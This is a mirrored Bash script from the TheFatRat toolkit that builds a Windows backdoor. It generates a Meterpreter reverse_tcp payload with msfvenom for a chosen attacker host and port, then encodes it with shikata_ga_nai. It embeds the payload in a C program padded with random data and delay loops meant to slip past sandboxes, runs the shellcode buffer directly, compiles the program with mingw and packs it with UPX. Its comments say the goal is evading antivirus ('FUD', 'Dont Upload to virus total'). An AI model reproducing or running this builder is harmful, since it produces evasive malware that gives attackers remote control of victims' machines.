mirror of
https://github.com/Screetsec/TheFatRat.git
synced 2023-12-14 02:02:58 +01:00
380 lines
10 KiB
Bash
380 lines
10 KiB
Bash
#!/bin/bash
|
|
file="config/config.path"
|
|
if [ -f "$file" ]
|
|
then
|
|
msfconsole=$(sed -n 13p ${file})
|
|
msfvenom=$(sed -n 14p ${file})
|
|
backdoor=$(sed -n 15p ${file})
|
|
searchsploit=$(sed -n 16p ${file})
|
|
output=$(sed -n 17p ${file})
|
|
else
|
|
echo "Configuration file does not exists , run setup.sh first ."
|
|
exit 1
|
|
|
|
|
|
fi
|
|
path=`pwd`
|
|
defcon=$path/config/conf.def
|
|
if [ -f "$defcon" ]
|
|
then
|
|
yourip=`sed -n 1p $defcon`
|
|
yourport=`sed -n 2p $defcon`
|
|
fi
|
|
|
|
function invalid1 ()
|
|
{
|
|
err=0
|
|
echo ""
|
|
if [ -z "$yourip" ]; then
|
|
echo -e $red ""
|
|
echo "[ ! ] You must write an IP or Hostname ."
|
|
echo -e $okegreen ""
|
|
echo "IP Example : 192.168.1.34
|
|
Domain Example : myhost.com"
|
|
err=1
|
|
fi
|
|
echo ""
|
|
if [ -z "$yourport" ]; then
|
|
echo -e $red ""
|
|
echo "[ ! ] You must write a port number between 1 & 65535 ."
|
|
err=1
|
|
fi
|
|
echo -e $okegreen ""
|
|
}
|
|
|
|
#get user local ip , public ip & hostname into variables
|
|
lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
|
|
lanip6=`ip addr | grep 'state UP' -A4 | tail -n1 | awk '{print $2}' | cut -f1 -d'/'`
|
|
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
|
|
hostn=`host $publicip | awk '{print $5}' | sed 's/.$//'`
|
|
comp="0"
|
|
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
|
|
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
|
|
# check mingw if exists
|
|
which i686-w64-mingw32-gcc > /dev/null 2>&1
|
|
if [ "$?" -eq "0" ]
|
|
then
|
|
echo [✔]::[mingw32]: installation found!;
|
|
comp="1"
|
|
fi
|
|
which x86_64-w64-mingw32-gcc > /dev/null 2>&1
|
|
if [ $? -eq 0 ]
|
|
then
|
|
echo [✔]::[mingw64]: installation found!;
|
|
|
|
if [ $comp == "0" ]
|
|
then
|
|
comp="2"
|
|
elif [ $comp == "1" ]
|
|
then
|
|
comp="3"
|
|
else
|
|
echo [x]::[warning]:this script require mingw32 or mingw64 installed to work ;
|
|
echo ""
|
|
echo [!]::Run setup.sh to install mingw64 ;
|
|
sleep 2s
|
|
exit 1
|
|
fi
|
|
fi
|
|
|
|
|
|
|
|
# check upx if exists
|
|
which upx > /dev/null 2>&1
|
|
if [ $? -eq 0 ]; then
|
|
echo [✔]::[Upx]: installation found!;
|
|
|
|
else
|
|
|
|
echo [x]::[warning]:this script require upx to work ;
|
|
echo ""
|
|
echo [!]::Run setup.sh to install upx ;
|
|
echo ""
|
|
sleep 2s
|
|
exit 1
|
|
fi
|
|
|
|
###################################################################################################
|
|
# FatRat Coded By Screetsec ( Edo Maland )
|
|
# Program to create a C program after it is compiled that will bypass most AV
|
|
# Test in Kali Linux :)
|
|
# Very Slow to create Backdoor But Very powerfull for bypass AV
|
|
# Easy to Use
|
|
# FUD for popular Antivirus :)
|
|
# Dont Upload to virus total
|
|
####################################################################################################
|
|
|
|
|
|
#Checking
|
|
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
|
|
clear
|
|
SERVICE=service;
|
|
|
|
#This colour
|
|
cyan='\e[0;36m'
|
|
green='\e[0;34m'
|
|
okegreen='\033[92m'
|
|
lightgreen='\e[1;32m'
|
|
white='\e[1;37m'
|
|
red='\e[1;31m'
|
|
yellow='\e[1;33m'
|
|
BlueF='\e[1;34m'
|
|
yellow='\e[1;33m'
|
|
orange='\e[38;5;166m'
|
|
|
|
rm -f $output/Powerfull.exe >/dev/null 2>&1
|
|
rm -f $output/Powerfull-fud.exe >/dev/null 2>&1
|
|
#Banner
|
|
clear
|
|
echo
|
|
echo -e $yellow""
|
|
echo " =========================================================================="
|
|
echo -e $okegreen" FatRat Coded By Screetsec ( Edo -Maland- ) "
|
|
echo
|
|
echo -e $yellow" / __/ /__ _ __ / _ )__ __/ /_ / _ \___ _ _____ ____/ _/_ __/ / / "
|
|
echo " _\ \/ / _ \ |/|/ / / _ / // / __/ / ___/ _ \ |/|/ / -_) __/ _/ // / / / "
|
|
echo " /___/_/\___/__,__/ /____/\_,_/\__/ /_/ \___/__,__/\__/_/ /_/ \_,_/_/_/ "
|
|
echo""
|
|
echo -e $okegreen" This program compiles a C program with a meterpreter reverse_tcp payload "
|
|
echo " In it that can then be executed on a windows host "
|
|
echo " Program to create a C program after it is compiled that will bypass most AV "
|
|
echo -e $yellow" =========================================================================="
|
|
echo -e $okegreen""
|
|
|
|
#input lhost and lport
|
|
echo -e $okegreen""
|
|
echo -e $yellow "Your local IPV4 address is : $lanip"
|
|
echo -e $yellow "Your local IPV6 address is : $lanip6"
|
|
echo -e $yellow "Your public IP address is : $publicip"
|
|
echo -e $yellow "Your Hostname is : $hostn"
|
|
echo -e $okegreen ""
|
|
if [ ! -f "$defcon" ]
|
|
then
|
|
yourip=""
|
|
yourport=""
|
|
fi
|
|
if [ -z "$yourip" ]; then
|
|
read -p ' Set LHOST IP: ' yourip
|
|
fi
|
|
echo -e $okegreen ""
|
|
if [ -z "$yourport" ]; then
|
|
read -p ' Set LPORT: ' yourport
|
|
fi
|
|
invalid1
|
|
if [ $err == "1" ]
|
|
then
|
|
echo -e $okegreen ""
|
|
echo -n "Press any key to restart again ."
|
|
read inp
|
|
./powerfull.sh
|
|
fi
|
|
|
|
echo ""
|
|
if [ $comp == "1" ]
|
|
then
|
|
COMPILER="i686-w64-mingw32-gcc"
|
|
fi
|
|
if [ $comp == "2" ]
|
|
then
|
|
COMPILER="x86_64-w64-mingw32-gcc"
|
|
fi
|
|
|
|
if [ $comp == "3" ]
|
|
then
|
|
echo ""
|
|
echo -e $yellow "You can compile this FUD for 32bit or 64bit windows machines"
|
|
echo ""
|
|
echo -e $green "Choose one of the following options"
|
|
echo -e $orange "+-------------------------------+"
|
|
echo -e $orange "|$white [$green 1$white ] $yellow Compile 32bit FUD Exe $orange |"
|
|
echo -e $orange "|$white [$green 2$white ] $yellow Compile 64bit FUD Exe $orange |"
|
|
echo -e $orange "+-------------------------------+"
|
|
echo ""
|
|
echo -ne $green "Choose (1 or 2) : " ;tput sgr0
|
|
read archs
|
|
case $archs in
|
|
1)
|
|
COMPILER="i686-w64-mingw32-gcc"
|
|
echo ""
|
|
echo -e $green "32bit Selected"
|
|
sleep 1
|
|
;;
|
|
2)
|
|
COMPILER="x86_64-w64-mingw32-gcc"
|
|
echo ""
|
|
echo -e $green "64bit Selected"
|
|
sleep 1
|
|
;;
|
|
*)
|
|
COMPILER="x86_64-w64-mingw32-gcc"
|
|
echo ""
|
|
echo -e $green "Invalid Option , setting 32bit as default"
|
|
sleep 1
|
|
;;
|
|
esac
|
|
fi
|
|
echo -e $okegreen
|
|
payload="windows/meterpreter/reverse_tcp"
|
|
msfvenomBadChars="\x00\xff"
|
|
msfvenomEncoder="x86/shikata_ga_nai"
|
|
msfvenomIterations="3" # Recommended value: 3
|
|
|
|
randomness=3517 # The higher the randomness the more padding is added to the c program increasing the binaries size
|
|
delayRandomness=32676 # The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox
|
|
|
|
#Set directory
|
|
currentDir=`pwd`
|
|
outputDir="$output/"
|
|
outputExe="${outputDir}Powerfull.exe" # You can change the name of the executable on this line
|
|
outputUPX="${outputDir}Powerfull-fud.exe" # You can change the name of the executable on this line
|
|
|
|
cProg="${currentDir}/prog.c"
|
|
cProgTemp="${currentDir}/prog.c.temp"
|
|
|
|
# Create some padding to be compiled in the C program this adds randomness to the binary
|
|
function old_generatePadding {
|
|
|
|
counter=0
|
|
randomNumber=$((RANDOM%${randomness}+7))
|
|
while [ $counter -lt $randomNumber ]; do
|
|
echo "" >> $cProg
|
|
randomCharnameSize=$((RANDOM%5+12))
|
|
randomPaddingSize=$((RANDOM%1024+2048))
|
|
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
|
|
randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
|
|
echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
|
|
let counter=counter+1
|
|
done
|
|
}
|
|
|
|
function generatePadding {
|
|
|
|
paddingArray=(0 1 2 3 4 5 6 7 8 9 a b c d e f)
|
|
|
|
counter=0
|
|
randomNumber=$((RANDOM%${randomness}+23))
|
|
while [ $counter -lt $randomNumber ]; do
|
|
echo "" >> $cProg
|
|
randomCharnameSize=$((RANDOM%10+7))
|
|
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
|
|
echo "unsigned char ${randomCharname}[]=" >> $cProg
|
|
randomLines=$((RANDOM%20+13))
|
|
for (( c=1; c<=$randomLines; c++ ))
|
|
do
|
|
randomString="\""
|
|
randomLength=$((RANDOM%11+7))
|
|
for (( d=1; d<=$randomLength; d++ ))
|
|
do
|
|
randomChar1=${paddingArray[$((RANDOM%15))]}
|
|
randomChar2=${paddingArray[$((RANDOM%15))]}
|
|
randomPadding=$randomChar1$randomChar2
|
|
randomString="$randomString\\x$randomPadding"
|
|
done
|
|
randomString="$randomString\""
|
|
if [ $c -eq ${randomLines} ]; then
|
|
echo "$randomString;" >> $cProg
|
|
else
|
|
echo $randomString >> $cProg
|
|
fi
|
|
done
|
|
let counter=counter+1
|
|
done
|
|
}
|
|
|
|
|
|
# Check to see the output directory exists
|
|
if [[ ! -d "$outputDir" ]]; then
|
|
mkdir $outputDir
|
|
fi
|
|
|
|
echo ""
|
|
echo "You may see multiple errors until the executable is compiled successfully."
|
|
echo ""
|
|
if [[ $msfvenomIterations > 3 ]]; then
|
|
echo "Most of the errors are due to the msfvenom iterations value is set too high."
|
|
echo "Recommended value: msfvenomIterations=3"
|
|
fi
|
|
echo ""
|
|
|
|
# Check to see if the executable was previously created
|
|
if [[ -f "$outputExe" ]]; then
|
|
echo "Remove the executable at ${outputExe} to recreate it."
|
|
echo ""
|
|
fi
|
|
|
|
|
|
sleep 2
|
|
|
|
|
|
# Until the Powerfull.exe is compiled successfully loop until it is
|
|
while [[ ! -f "$outputExe" ]]; do
|
|
|
|
# Delete the c program and recreate it
|
|
rm -f $cProg
|
|
|
|
generatePadding
|
|
|
|
echo "" >> $cProg
|
|
echo "int main(void)" >> $cProg
|
|
echo "{" >> $cProg
|
|
|
|
# Introduce a couple of processing loops for a delay
|
|
echo "" >> $cProg
|
|
echo "int zewd5 = 1, rqs3 = 1;" >> $cProg
|
|
echo "for ( zewd5 = 1 ; zewd5 <= ${delayRandomness} ; zewd5++ )" >> $cProg
|
|
echo " for ( rqs3 = 1 ; rqs3 <= ${delayRandomness} ; rqs3++ )" >> $cProg
|
|
echo " {}" >> $cProg
|
|
echo "" >> $cProg
|
|
|
|
generatePadding
|
|
|
|
echo "" >> $cProg
|
|
$msfvenom -p ${payload} LHOST=$yourip LPORT=$yourport -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg
|
|
|
|
generatePadding
|
|
|
|
echo "" >> $cProg
|
|
echo "((void (*)())buf)();" >> $cProg
|
|
echo "" >> $cProg
|
|
|
|
generatePadding
|
|
|
|
echo "" >> $cProg
|
|
echo "}" >> $cProg
|
|
|
|
randomBufNameSize=$((RANDOM%10+23))
|
|
randomBufName=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomBufNameSize}`
|
|
cat $cProg | sed "s/buf/${randomBufName}/g" > $cProgTemp
|
|
mv -f $cProgTemp $cProg
|
|
# To install the following program on Kali Linux - "apt-get install gcc-mingw32"
|
|
$COMPILER -o $outputExe $cProg
|
|
|
|
done
|
|
if [[ -f "$outputExe" ]]
|
|
then
|
|
echo "Uncompressed backdoor created in : $outputExe"
|
|
else
|
|
echo "Unable to compile backdoor"
|
|
echo -n "Press Enter to return to menu"
|
|
read rsp
|
|
exit 0
|
|
fi
|
|
echo ""
|
|
echo -n "Compressing $outputExe with UPX to be less detectable ...."
|
|
# Use UPX to create a second executable, testing...
|
|
upx -q --ultra-brute -o $outputUPX $outputExe >/dev/null 2>&1
|
|
echo "Done"
|
|
|
|
if [[ -f "$outputUPX" ]]
|
|
then
|
|
echo "Compressed Backdoor was build in : $outputUPX"
|
|
echo ""
|
|
echo -n "Press Enter to return to fatrat menu"
|
|
read rsp
|
|
exit 0
|
|
else
|
|
echo "Unable to compress $outputExe with UPX"
|
|
echo -n "Press Enter to return to fatrat menu"
|
|
read rsp
|
|
exit 0
|
|
fi
|